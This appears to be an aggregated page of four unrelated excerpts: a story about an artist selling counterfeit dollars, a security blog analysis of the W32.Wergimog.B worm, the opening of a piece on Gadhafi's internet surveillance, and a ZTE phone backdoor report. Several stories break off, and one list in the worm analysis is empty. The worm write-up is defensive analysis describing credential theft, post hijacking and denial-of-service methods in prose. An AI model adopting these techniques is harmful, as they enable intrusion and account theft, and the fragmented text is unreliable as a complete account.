The Ultimate Counterfeiter Isn’t a Crook—He’s an Artist

Photo:  Jaap Scheeren

Photo: Jaap Scheeren

On a bright May afternoon in 2007, a German artist and printmaker named Hans-Jürgen Kuhl took a seat at an outdoor café directly opposite the colossal facade of the Cologne Cathedral. He ordered an espresso and a slice of plum cake, lit a Lucky Strike, and watched for the buyer. She was due any minute. Kuhl, a lanky 65-year-old, had to remind himself that he was in no rush. He’d sold plenty of artwork over the years, but this batch was altogether different. He needed to be patient.

Tourists milled about the platz in front of the cathedral, Germany’s most visited landmark, craning their necks to snap pictures of the impossibly intricate spires jutting toward the heavens. Kuhl knew those spires well. He had grown up in Cologne and painted the majestic cathedral countless times.

On the other side of a low brick wall surrounding the café, Kuhl finally spotted her. Tall, blond, and trim, Susann Falkenthal looked about 30. As was the case during their previous meetings, she wore practical shoes, an unremarkable blouse and pair of pants, and little makeup. Kuhl thought her plain look was something of a contradiction for a businesswoman who drove a black BMW convertible, but no matter.

When they first met a few months earlier, Falkenthal said she was an events manager from Vilnius, Lithuania, and gave Kuhl a card printed with a Vilnius address as well as an address from the German city of Essen. Her German was flawless.

This appointment by the cathedral was perhaps their 10th, and they greeted each other with a kiss on each cheek. Over the past few months, they had been meeting at Kuhl’s studio. She brought cake; he made coffee. They discussed jazz, Kuhl’s years as a fashion designer, the time Kuhl had met Andy Warhol, vacation spots on the Spanish island of Majorca, and eventually counterfeit US dollars.

If Kuhl couldn’t sell his beautiful fake bills, they would just end up rotting in a storage locker.

Early on, Falkenthal said she did a lot of business with Russian contacts in Vilnius, where unscrupulous types would sometimes try to bribe bouncers with fake $100 bills to gain access to exclusive events organized by her firm. Kuhl sympathized and mentioned a couple of tricks for detecting forgeries. “It’s easy to see and feel if it’s fake or not,” he told her.

A few weeks later, Falkenthal told Kuhl that she had a high-end party coming up in August. Would he be interested in printing the tickets for it? She wanted them to have unique serial numbers and some way to protect against forgeries. Kuhl suggested a strip that shines brightly when exposed to an ultraviolet lamp. Falkenthal told him the official order was for 300 tickets but then with a wink requested he print an extra 50 for her to sell on the side. She obviously isn’t the Pope, Kuhl thought. Working with her might get interesting.

After Kuhl printed the tickets for Falkenthal—including the extra 50—and was paid, he decided to take his chances with her. Not in the romantic sense, although during some of Falkenthal’s visits to his studio, Kuhl certainly noticed the way she’d drape an arm on the back of his desk chair and lean over him to inspect print drafts on his monitor. He thought they could do business. There were risks, Kuhl knew, but he tended to trust people. So he showed her a counterfeit $100 bill that he had made. As a precaution, he told her the sample had come from someone in Poland. There may be many more, he added. She asked if she could borrow it to show to a Russian friend. He said sure but warned her to be cautious. He knew from experience that this “area of business” was full of informants and undercover cops.

Falkenthal called Kuhl two weeks later. Her contact was impressed with the sample and interested in a purchase. They started with a test batch of $250,000, which she bought for 21,600 euros. The price was typical for forgeries, which generally sell at a steep discount because so much of the risk is borne by the buyer. As a consequence, counterfeiting is profitable only on a large scale. During that exchange, Kuhl told Falkenthal that he and his business partner had about $8 million more in currency to sell. “If the contact is satisfied with this first installment, we should talk,” he said. Ten days later she got back to him with good news: The man was “happy with the forgeries” and wanted to make a larger purchase. How about $6.5 million?

Seated at the café across from the cathedral that afternoon, Kuhl handed Falkenthal a note with a price for this new order: 533,000 euros for the $6.5 million in counterfeits. She agreed. Then they decided to make the handoff the next day at his studio. Kuhl also told Falkenthal that to ensure his safety he would have someone nearby during the exchange, just to be sure the handover went smoothly. “I have no choice,” he said, “even though I basically trust you.”

When Kuhl and Falkenthal stood up to part ways, Falkenthal added that she would bring her own boxes. After all, $6.5 million in $100 bills weighs about 150 pounds.

Worm Posts on SNS Sites and Wipes out Rivals

W32.Wergimog is a worm that attempts to spread through removable drives and opens a back door. When I looked into its variants, I found an interesting sample, which I named W32.Wergimog.B. Both samples are based on the same source code, but the .B variant contains even more interesting functionality that I would like to detail here.

For legitimate applications

W32.Wergimog.B injects itself into legitimate applications, such as Internet Explorer and Mozilla Firefox, as shown in Figure 1.

Figure 1. Threat injects itself into certain applications and then connects to the Internet

Once it confirms that the applications it has injected itself into have network connectivity, it performs the functions outlined below.

Posting on Social Networking Service (SNS) sites

If a user connects to any of the following SNS sites, the worm is capable of modifying a chat message, status update, or Tweet:

  • Facebook Chat
  • Facebook Wallpost
  • Hi5 Status Update
  • Hyves Status
  • Linkedin Status Update
  • Myspace Status Update
  • Omegle Chat
  • Tweet (Twitter)

Initially, the worm connects to the command-and-control (C&C) server to obtain the content that it posts to the SNS services. At present, we are unable to obtain these posts, but the posting command is called ‘spread’. It is likely, therefore, that the post contains a URL that points to a location where a user might download W32.Wergimog.B or some other malicious program.

This is not the first threat to attempt to spread through SNS sites. W32.Koobface, for example, also applied this approach. While there is an overlap in the sites that both of these worms use to spread, one distinction between the two is that unlike the Koobface family, W32.Wergimog.B does not make its own connection to the SNS servers by itself. Rather, it needs to wait for a user to make a new post and then the worm modifies it.

Account stealing

Another function of the worm allows it to steal user account and password information if a compromised user logs in to any of the following sites:


It is interesting to note that some of the above sites are file sharing services. It is possible, therefore, that the stolen account information may be used to spread the worm through these download sites, thereby allowing it to spread even further.

Attack on rival threats

An interesting feature of this worm is that it also injects itself into other threats, as shown in Figure 2.

Figure 2. Injects itself into rival threats

The worm contains lists of rival threat names and signatures to determine if the threats exist on the same computer. The following threats are targeted:

  • DarkComet
  • IRCBot
  • Metus
  • RXBot
  • Warbot
  • xvisceral

The following image illustrates rival threat names and their corresponding signatures.

Figure 3. Threat names and corresponding signature “pairs”

After infection the worm hooks network communication on the computer. It then attempts to identify the signatures and end any processes of rival threats that it finds, as can be seen in the image below. This is very similar to how IPS software operates.

Figure 4. Wergimog.B kills processes of any rival threats that it finds

The targeted threats are very prevalent, so it may be that the W32.Wergimog.B author wants to avoid being removed along with these threats. This is because an increase in malicious network communications allows a user to be aware that an infection exists.

Sometimes we see a function in a threat that attempts to end the operation of rival threats, but generally speaking such functionality is very simple. For example, checking for a specific file path, process name, or registry entry. Conversely, the method employed by W32.Wergimog.B is very reliable as the signatures are very specific and thus it can be sure of stopping the rival threats.

In addition, both the original W32.Wergimog and the .B variant have three types of denial-of-service (DoS) attack vectors, which are UDP flooding, SYN flooding, and ‘Slowloris’. A DoS tool called Slowloris was released in 2009 and had a big impact on servers. It targets Apache 1.x, 2.x, and some HTTP servers. It’s a little old now but remains popular. W32.Wergimog variants use the same technique but we don’t know what the relationship is between the original tool and W32.Wergimog variants.

These two variants started to appear between April and June 2011, and both of them have continued to be reported on until April of this year. To avoid infection by the W32.Wergimog variants, keep your security products and OS updated. We are continuing to watch out for developments of the W32.Wergimog worm.

Jamming Tripoli: Inside Moammar Gadhafi’s Secret Surveillance Network

Photo: Michael Christopher Brown

The Internet enabled surveillance on a scale that would have been unimaginable with the old tools of phone taps and informants.
Photo: Michael Christopher Brown

He once was known as al-Jamil—the Handsome One—for his chiseled features and dark curls. But four decades as dictator had considerably dimmed the looks of Moammar Gadhafi. At 68, he now wore a face lined with deep folds, and his lips hung slack, crested with a sparse mustache. When he stepped from the shadows of his presidential palace to greet Ghaida al-Tawati, whom he had summoned that evening by sending one of his hulking female bodyguards to fetch her, it was the first time she had seen him without his trademark sunglasses; his eyes were hooded and rheumy. The dictator was dressed in a white Puma tracksuit and slippers. How tired and thin he looked in person, Tawati thought.

It was February 10, 2011, and Libya was in an uproar. Two months earlier, in neighboring Tunisia, a street vendor named Mohammed Bouazizi had set himself on fire after a policewoman beat him and confiscated his wares. It was the beginning of the Arab Spring, a series of uprisings, revolutions, and civil wars that would radically alter the politics of the Middle East. In Libya, opponents of the Gadhafi regime had called for a day of protest on February 17, to mark the anniversary of a 2006 protest in the city of Benghazi, where security forces had killed 11 demonstrators and wounded dozens more.

Tawati was one of the most outspoken dissidents blogging openly from inside Libya. Thirty-four years old, with a gravelly childlike voice and singsong laugh that belied her deep stubbornness, she had come to political consciousness during the mid-2000s, at a time when Gadhafi, seeking reconciliation with the West, had ceased using his most heavy-handed tactics of repression—such as outright massacres—and allowed a modicum of public dissent. During her university days, when the Internet had begun to ease the country’s isolation, Tawati took naturally to the roles of gadfly and outsider. Her parents had divorced when she was young; in Libya’s deeply conservative culture, growing up with a single mother made her a social outcast. The injustice she experienced as a child led her to critique the injustice of the dictatorial regime, particularly on women’s issues—for example, she blogged about a sexual abuse scandal at a home for unwed mothers institutionalized by the Gadhafi government. Over time she won a modest following online. As the planned protests of February 17 approached, Tawati, always prone to impassioned rhetoric, blogged that if Libyans failed to turn out for the demonstrations she would burn herself just as Bouazizi had done. Somehow Gadhafi himself had heard news of this threat and decided he needed to meet her.

Despite the dictator’s haggard appearance, his manner remained confident and effusive. When he wanted to be, Gadhafi was a legendary charmer, a man deeply at ease with ordinary Libyans. He shook Tawati’s hand and patted her shoulder paternally, directing her to sit next to him on the sofa. He asked her about her health, her family, where she was from. He asked her who had taught her to write. She told him about her demands for greater openness and accountability in Libya, taking care not to criticize him directly. He seemed sympathetic, nodding at various points. Finally she worked up the courage to ask him why the government had blocked YouTube several months earlier.

Gadhafi acted oblivious. “Is it switched off?” he asked.

She complained to him about the way that allies of his regime had treated her. Ever since she’d started blogging under her own name in 2007, Tawati had been harassed—and worse. “Ghaida al-Tawati, the goat of the Internet,” read one Facebook page her attackers created; a string of graphic sexual comments were posted underneath her photo. More bewildering, though, was the invasion of privacy: Somehow, emails of hers had been leaked onto the Internet, even displayed on state television, she told Gadhafi. She had been accused of working with foreign agents. Her reputation as a woman had been smeared.

“If you want to get married,” he interjected, “we’ll get you married to the best man.”

“I’m not interested in getting married,” she replied.

“So, have you made an appointment to burn yourself, then?” Gadhafi asked suddenly, a wry smile curling his lips.

Tawati said that she hadn’t—yet.

“What do you really want from me?” he asked with exasperation.

“You already know the reason why people are demonstrating,” she replied.

Gadhafi’s gaze settled on her for a moment. He asked her to come work for him. The two of them would solve these problems together, he said.

It was an odd show of vulnerability, this bid to co-opt her rather than threaten or crush her. This was the moment, Tawati would later say, that she realized the uprising would succeed. The old man didn’t understand just how committed she and other dissidents were to his downfall. In Libya, as in Egypt and elsewhere, the drive toward revolution drew much of its energy from young, educated activists like Tawati, for whom online tools served as an unprecedented means for communicating and rallying support.

But like Tawati, these activists would suffer greatly at the hands of Gadhafi’s spy service, whose own capabilities had been heightened by 21st-century technology. By now, it’s well known that the Arab Spring showed the promise of the Internet as a crucible for democratic activism. But, in the shadows, a second narrative unfolded, one that demonstrated the Internet’s equal potential for government surveillance and repression on a scale unimaginable with the old analog techniques of phone taps and informants. Today, with Gadhafi dead and a provisional government of former rebels in charge, we can begin to uncover the secret, high tech spying machine that helped the dictator and his regime cling to power.

Top Handset Maker Confirms Backdoor in One of Its Models

Photo: Pierre Lecourt/Flickr

One of the world’s top handset makers has acknowledged the existence of a backdoor in one of its models.

ZTE, which is based in China and produces the ScoreM, which sells as a Google Android phone, admitted that it had placed a backdoor account with a hardcoded password, which is easily found online. The backdoor was used by the company to remotely update its firmware, according to Reuters. But its existence would also allow anyone else with knowledge of the password to access a Score phone and gain root access.

“It could very well be that they’re not very good developers or they could be doing this for nefarious purposes,” Dmitri Alperovitch, co-founder of cybersecurity firm CrowdStrike, told the news service.

ZTE has vowed to fix the security hole.

“ZTE is actively working on a security patch and expects to send the update over-the-air to affected users in the very near future,” ZTE told Reuters. “We strongly urge affected users to download and install the patch as soon as it is rolled out to their devices.”